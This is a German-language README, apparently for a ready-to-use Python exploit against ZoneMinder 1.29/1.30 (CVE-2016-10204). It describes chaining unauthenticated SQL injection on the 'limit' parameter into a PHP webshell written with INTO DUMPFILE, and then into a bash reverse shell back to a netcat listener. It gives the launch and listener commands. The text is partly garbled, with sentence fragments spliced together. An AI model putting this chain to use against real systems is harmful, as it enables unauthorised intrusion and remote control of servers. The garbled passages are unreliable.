
Unauthentifizierte SQL-Injection-zu-RCE-Exploit für ZoneMinder 1.29/1.30 (CVE-2016-10204, EDB-41239). Single-Command-SQLi-zu-Webshell-zu-Reverse-Shell-PoC in Python.
Ein sofort einsetzbarer Python-Exploit für ZoneMinder 1.29/1.30, der die nicht authentifizierte SQL-Injection (CVE-2016-10204, EDB-41239) bis hin zu einer interaktiven Reverse Shell verkettet.
Dies ist ein weaponized/automatisierter PoC für eine bekannte, gepatchte CVE, kein neuer Exploit.
Der EDB-PoC für diesen Bug endet beim SQLi-Payload oder bei "richte sqlmap darauf." Dieser Exploit verpackt die vollständige Kette SQLi zu Webshell zu Shell in ein einziges lesbares Skript.
SLEEP)-Sonde auf dem limit-POST-
Parameter von index.php?view=request&request=log&task=query.SELECT ... INTO DUMPFILE in das Web-Root,
wobei mehrere gängige ZoneMinder/Apache-Pfade ausprobiert werden.bash-Reverse-Shell an deinen
netcat-Listener.DUMPFILE, nicht OUTFILE. OUTFILE escapt Zeilenumbrüche und verunstaltet
mehrzeiliges PHP; DUMPFILE schreibt Rohbytes, sodass die Webshell gültig bleibt.# pop a shell
python3 zm-exploit.py -u http://TARGET/zm/ -l YOUR_IP -p 443
# start your listener when prompted, in another terminal
sudo nc -lvnp 443
# afterwards, remove the webshell it dropped (name is printed at the end)
python3 zm-exploit.py -u http://TARGET/zm/ --cleanup a1b2c3d4.php
MIT, siehe LICENSE.